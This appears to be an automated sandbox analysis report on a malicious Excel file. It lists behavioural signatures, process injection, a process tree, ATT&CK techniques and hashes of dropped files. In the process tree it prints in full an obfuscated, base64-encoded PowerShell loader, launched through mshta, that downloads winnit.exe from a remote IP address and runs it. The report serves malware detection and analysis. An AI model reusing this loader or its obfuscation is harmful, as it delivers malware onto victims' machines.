d4bb6fcd2077fab4abe6012089f2bffbee52b0cc5b69ccc2b5e250672bee25be

Resubmissions

20-01-2025 14:15

250120-rkxxrstjhp 1

21-11-2024 08:38

241121-kjv88azqfs 10

Analysis

max time kernel
120s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
21-11-2024 08:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d4bb6fcd2077fab4abe6012089f2bffbee52b0cc5b69ccc2b5e250672bee25be.xls
Size

1.1MB
MD5

2eb01e0a87e7c2c842bce6d75f34e083
SHA1

df9ae618023a951ebacb254ec51ac1306c87cc73
SHA256

d4bb6fcd2077fab4abe6012089f2bffbee52b0cc5b69ccc2b5e250672bee25be
SHA512

3a3f9649ef09b2b01dbabd2ca1c3291272590bb7ef56899eee58e058242ccb5b498e2e30cf302abc97cc2f6ec1dfe930d15d29a8ed2444108e204519d966735d
SSDEEP

24576:/uq9PLiijE2Z5Z2amC/gY/tMJE8F84LJQohy5bLFqQEbG1jcu:/uEPLiij7Z5ZK0g8tMpFjLJQohy5VqLQ

Score

10^/10

defense_evasion discovery execution

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2188	2220	mstsc.exe	29

Blocklisted process makes network request 3 IoCs

flow	pid	Process
12	2756	mshta.exe
13	2756	mshta.exe
15	1716	POWERsHELl.exE

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
1716	POWERsHELl.exE
2056	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1572	winnit.exe

Loads dropped DLL 4 IoCs

pid	Process
1716	POWERsHELl.exE
1716	POWERsHELl.exE
1716	POWERsHELl.exE
2188	mstsc.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0008000000018d7b-63.dat	autoit_exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	POWERsHELl.exE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1572 set thread context of 1980	1572	winnit.exe	38
PID 1980 set thread context of 2220	1980	svchost.exe	29
PID 1980 set thread context of 2188	1980	svchost.exe	39
PID 2188 set thread context of 2220	2188	mstsc.exe	29

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winnit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mstsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWERsHELl.exE

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\Registry\User\S-1-5-21-3063565911-2056067323-3330884624-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	mstsc.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2220	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1716	POWERsHELl.exE
2056	powershell.exe
1980	svchost.exe
1980	svchost.exe
1980	svchost.exe
1980	svchost.exe
2188	mstsc.exe
2188	mstsc.exe
2188	mstsc.exe
2188	mstsc.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
1572	winnit.exe
1980	svchost.exe
2220	EXCEL.EXE
2220	EXCEL.EXE
2188	mstsc.exe
2188	mstsc.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1716	POWERsHELl.exE
Token: SeDebugPrivilege	2056	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1572	winnit.exe
1572	winnit.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
1572	winnit.exe
1572	winnit.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2220	EXCEL.EXE
2220	EXCEL.EXE
2220	EXCEL.EXE
2220	EXCEL.EXE
2220	EXCEL.EXE

Suspicious use of WriteProcessMemory 29 IoCs

description	pid	Process	procid_target
PID 2756 wrote to memory of 1716	2756	mshta.exe	31
PID 2756 wrote to memory of 1716	2756	mshta.exe	31
PID 2756 wrote to memory of 1716	2756	mshta.exe	31
PID 2756 wrote to memory of 1716	2756	mshta.exe	31
PID 1716 wrote to memory of 2056	1716	POWERsHELl.exE	34
PID 1716 wrote to memory of 2056	1716	POWERsHELl.exE	34
PID 1716 wrote to memory of 2056	1716	POWERsHELl.exE	34
PID 1716 wrote to memory of 2056	1716	POWERsHELl.exE	34
PID 1716 wrote to memory of 1328	1716	POWERsHELl.exE	35
PID 1716 wrote to memory of 1328	1716	POWERsHELl.exE	35
PID 1716 wrote to memory of 1328	1716	POWERsHELl.exE	35
PID 1716 wrote to memory of 1328	1716	POWERsHELl.exE	35
PID 1328 wrote to memory of 760	1328	csc.exe	36
PID 1328 wrote to memory of 760	1328	csc.exe	36
PID 1328 wrote to memory of 760	1328	csc.exe	36
PID 1328 wrote to memory of 760	1328	csc.exe	36
PID 1716 wrote to memory of 1572	1716	POWERsHELl.exE	37
PID 1716 wrote to memory of 1572	1716	POWERsHELl.exE	37
PID 1716 wrote to memory of 1572	1716	POWERsHELl.exE	37
PID 1716 wrote to memory of 1572	1716	POWERsHELl.exE	37
PID 1572 wrote to memory of 1980	1572	winnit.exe	38
PID 1572 wrote to memory of 1980	1572	winnit.exe	38
PID 1572 wrote to memory of 1980	1572	winnit.exe	38
PID 1572 wrote to memory of 1980	1572	winnit.exe	38
PID 1572 wrote to memory of 1980	1572	winnit.exe	38
PID 2220 wrote to memory of 2188	2220	EXCEL.EXE	39
PID 2220 wrote to memory of 2188	2220	EXCEL.EXE	39
PID 2220 wrote to memory of 2188	2220	EXCEL.EXE	39
PID 2220 wrote to memory of 2188	2220	EXCEL.EXE	39

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d4bb6fcd2077fab4abe6012089f2bffbee52b0cc5b69ccc2b5e250672bee25be.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2220
- C:\Windows\SysWOW64\mstsc.exe
  "C:\Windows\SysWOW64\mstsc.exe"
  2⤵
  - Process spawned unexpected child process
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:2188

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2756
- C:\Windows\SysWOW64\WInDowsPOweRSHELl\v1.0\POWERsHELl.exE
  "C:\Windows\SYsTem32\WInDowsPOweRSHELl\v1.0\POWERsHELl.exE" "pOwErSHelL.exE -EX BYpaSs -NoP -W 1 -C dEvICECREdENTiAlDePLOymeNt ; IEX($(iEx('[SYsTEM.tExt.EncoDIng]'+[CHar]0x3A+[CHar]0X3a+'uTf8.GEtSTrInG([SYSteM.COnverT]'+[CHaR]58+[ChAr]58+'fROmbaSE64stRInG('+[chAR]34+'JEg2SjZDTWV2TSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iRXJEZUZpTmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1vbi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlYkVMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRnRHNYWnRYRmUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUU9ELHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWmx6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEltRHp4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRUhMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkSDZKNkNNZXZNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My40LjYxLzMxL3dpbm5pdC5leGUiLCIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSIsMCwwKTtTdGFSdC1zbEVFUCgzKTtpZVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHdpbm5pdC5leGUi'+[Char]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Loads dropped DLL
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1716
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -NoP -W 1 -C dEvICECREdENTiAlDePLOymeNt
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2056
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qrn_jrca.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1328
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2A7B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2A6A.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:760
- - C:\Users\Admin\AppData\Roaming\winnit.exe
    "C:\Users\Admin\AppData\Roaming\winnit.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1572
  - - C:\Windows\SysWOW64\svchost.exe
      "C:\Users\Admin\AppData\Roaming\winnit.exe"
      4⤵
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:1980

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1087EC93233409051A3831D3D6C361C8

Filesize
504B

MD5
0b60282e9ddea43ca313d63ec56740ad

SHA1
e7cc9ff054f23bdd36103a4e90cc9f7e8e8b214a

SHA256
358893a6900a0c0cc4d1457dbe7bcdef7e24b7c437d3623806f23827caac2c13

SHA512
ed83aaf8dd61a513ec6854b3ba948fcfd8d4ffcbefebe082330d320f0c234003ba0b290eada14f79836cffd792931eb19bd3539ab2801c9c00c244e228439024

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
4d026e25b249f1b2fdb47579c658d574

SHA1
941a2eae38499e16be628c9ac74048c9de043524

SHA256
3c5f001e20a82f1dff9cf96418e1397b00926fb0974895fb79ee576aed737ad9

SHA512
4f2a78ac19f343a51df3f74f237d157dc377505dfdde3fa5f4018bc327c97c957d8fc08d8bffde79290dbe09ac158b768d4ea1b090e88e80fc8d2f08e5c5be2a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1087EC93233409051A3831D3D6C361C8

Filesize
550B

MD5
08709884cd7f3873ec5b80c691a7dc30

SHA1
589e80d526cb4db03e3fe8da7515b3966d57ab00

SHA256
307ca82d4ff269c6baa55f389d7bc3fda0ed5164878f23ed7e9360573e029075

SHA512
891b9a02c5f386bb18e2fc1cc857a607c26f2551e64389ab58188e899ed05ae27d42ac0d58da084eeb616eb32c8c4d212900d00da12370a5936dedb61ce5a06c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
59dc1813dfa510545f2568014565a71f

SHA1
7c8462a727d3dfa92f9c07f25ac8d51549cbb4a9

SHA256
9c557b21fcc958ebcf74ca65c8d31cd4caf2c7d17a62eb1022f950834d9f651a

SHA512
b4e54aa353bbcda5007aea2537bc93370ea2b920dac32c749cb3fbaca4490d394bbc1fd61fc190b82651d0577e214ed5adefbea41e62059f89486d7b59980a01

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\generatethebstgoodpeoplesaroundtheworldwithgood[1].hta

Filesize
8KB

MD5
de4061dd97364abc29b7f7b2c28a3a1e

SHA1
4865eaa60ffd4b9b5b5fdc6753aafb6867fbb50d

SHA256
7b1ac8ddfc4e58bf8909d11a5fe6085e4aefa48de2750b569ef73e3cb555f6a9

SHA512
5c1652de15050b7ce4231315cab0afde5ca4112fc33f4f7dd71170110ec27d0c307e75b9b41556373711cae3a18e3752fb7ea4d2339d15cc6172a93d956c2d67

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab20BA.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2A7B.tmp

Filesize
1KB

MD5
702deb0dca8697a0d8eae8d45025c0eb

SHA1
ba533e9de5a2d3b953c25a0ed594a247011420c6

SHA256
5fc103a414ee315dc4527138892d25d578ac4bb2a05526693b36e3fe3317959d

SHA512
df15aef912dddd34f104f9a73e48dc46b8cfd1a50ac199234fe5ee850807ec9c2f33313b35c2246c012f4f8bc760e6126116eb6148824c93583b90b8546a746a

Download Submit
C:\Users\Admin\AppData\Local\Temp\biopsies

Filesize
283KB

MD5
b9aef5fc571d33a584126b52aeb0f4e8

SHA1
a975ee1cfe6b9884ba9f2298b1c5cb073d5bd4c3

SHA256
6101c11ee57917c64f8d0c59052979565a3188cc47e64a01f6e120be5bf51d0e

SHA512
f49547da1fe28b9e994fbb0ecc08101c00dad76d79ad10b4c52a7f079c74a375999492a58ef67eb7ddf9de0386e0e6db3d6edc88cef49a8f8a18cc002a2be65c

Download Submit
C:\Users\Admin\AppData\Local\Temp\pj0xahy8.zip

Filesize
434KB

MD5
6366b1751087ba991f1b4188a3f38486

SHA1
449fab91dcd435e62a96dc4b400671ba0460a84a

SHA256
3102600d3ad67b0e3f132bc0f8e0e66d976ba3700c3cc96459b65a87fa57c373

SHA512
e1a8eb6dcfe0732299ccf74a0e61acbd132da4abac8aad996c2ba481328c0671530a55347f694f23a01a40e2343976196fc09fdd4573ab996a8a88d8e7693b90

Download Submit
C:\Users\Admin\AppData\Local\Temp\qrn_jrca.dll

Filesize
3KB

MD5
d1e33f60c3d097127c6ed8870d176321

SHA1
56def600d90513a2cfe0fbb511945d4c8b850e54

SHA256
79864bd34113d5678d713c9830a270a0f77271ac5bb9cb155efdb99ed5d83e66

SHA512
a3df37e811ccfb6351527831588347ab8e77bfc5702a4c97c094c81e7945f5e47b228bd0afa0306b31585ba3174ff5fbb458040dae4cfc0af62e104e0301bf69

Download Submit
C:\Users\Admin\AppData\Local\Temp\qrn_jrca.pdb

Filesize
7KB

MD5
cefebf80b901832174ffc1f979c98f31

SHA1
3e3e57f6b1965eaac695b0053c2c16bfa25c3938

SHA256
9e8ccf94e72bb0eabab2261da57f3ecdbbcbd5002c6bfb89c336078ba42ab0e5

SHA512
13a212f0591147994ef874ee79d82d1a812943518db976005f5a63711c73da87a5a0e903c19109ea33490d5c2455e1a6c6a54e7c2a31180a1c5010679df32b6d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
4194546aa202839cecb495fa21ace8c8

SHA1
c0f6183f95da4de3e37ae40df675243e8090d000

SHA256
8d46018bcc53e3cfd39004c1ff21deb18342439a619616f2b8ad1c507b31caa2

SHA512
e8fbb600916f8202444b26926edc9069d5417c1292be96f76dd072e3aea3cd4ecddc258aa6185292edf39ade235209fdcf1592398f06dddc965e84a9a6f40d3d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC2A6A.tmp

Filesize
652B

MD5
c2df231409b08f999685e8c9a1c6415e

SHA1
461ca240e72ddf7d89d3c3484fd940cb85ea6066

SHA256
89b2904ad1c0fb5d935c0c58c2f1f08872a0d1aee8d9adf7f4e3b16ef648c8b5

SHA512
f95c9e229210ec043af5c86e1e8dc4dda8e2170a39366f9334f52a09ee3efcc8e92a63873b3dac2630303dbd1e38f68db168a5d88e333e5600bac177a1b5785e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qrn_jrca.0.cs

Filesize
468B

MD5
48a7068c5ea30224362ecb07c9c9f0e0

SHA1
50311380942823baa1b6700fdada8374590c4cf6

SHA256
bc65a6ea3909c162910f9ab3268b3d9c97ceb0e65fcb87b28a653c2d07b12136

SHA512
f3e57c4f7a060a3140bd833723936a3a5eaa03d1397798c5db53a9185499250b2ee724ece3904f70fbda9b778198cd3f41ab09dc06c172bc2c08e36842b16f03

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qrn_jrca.cmdline

Filesize
309B

MD5
734d1e942e14316548d915a8f4de26b9

SHA1
caee1f16eb6a36a557977eef5ee07498630a326c

SHA256
96603f550b6df32291ce0b19576fa335462aabb0a509c19911ed0960691bc6c9

SHA512
e66b69343bb63b554133c5dcfe72c8f5b1879c072f5de6e83e952d226334b3d1db8d98ab5e46389212e72c98be3bd7252c22c6b71dc2cdd2d71ade60d5bcb58c

Download Submit
\Users\Admin\AppData\Local\Temp\sqlite3.dll

Filesize
831KB

MD5
f4d8be409d1bd016a7b3b2580a2b90fb

SHA1
a68e1f6a9b2234f2269d9cf1fbda94124c428dbe

SHA256
d70b27121bb33012560b14a7bd597666d76193d7dc5f89e2ac5e7507240bf708

SHA512
9892cd38d77898fe7916a8810c82a377bbcb4f0c3f75a8295943fa29a5cb4daec95a1600a74614f31ec723967fd95721174042f2e54b12e52fe85202cdf052df

Download Submit
\Users\Admin\AppData\Roaming\winnit.exe

Filesize
1.2MB

MD5
c4e558e3ae2abda535f3bcf85eb36e1e

SHA1
01aa5269d85af968ec255ba40b9e52679f79ebaf

SHA256
4171986e64cb8dbc618b0b403b4f994b57286bbd87e5b528763871df58883211

SHA512
c247a2abd47cc2603b04f0bd4eb3a2f1bb18c3aab3883de0855404d7e92aa90084361cc3c74a6ecacadb97a80b950ae418766f061653ae00b850d4b1b036b2b1

Download Submit
memory/1980-79-0x0000000000400000-0x0000000000447000-memory.dmp

Filesize
284KB

Download
memory/2188-82-0x00000000000D0000-0x0000000000114000-memory.dmp

Filesize
272KB

Download
memory/2188-81-0x00000000000D0000-0x0000000000114000-memory.dmp

Filesize
272KB

Download
memory/2188-120-0x00000000000D0000-0x0000000000114000-memory.dmp

Filesize
272KB

Download
memory/2188-121-0x0000000061E00000-0x0000000061EBD000-memory.dmp

Filesize
756KB

Download
memory/2220-80-0x000000007221D000-0x0000000072228000-memory.dmp

Filesize
44KB

Download
memory/2220-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2220-83-0x0000000007710000-0x0000000007837000-memory.dmp

Filesize
1.2MB

Download
memory/2220-1-0x000000007221D000-0x0000000072228000-memory.dmp

Filesize
44KB

Download
memory/2220-19-0x0000000000620000-0x0000000000622000-memory.dmp

Filesize
8KB

Download
memory/2756-18-0x0000000000AA0000-0x0000000000AA2000-memory.dmp

Filesize
8KB

Download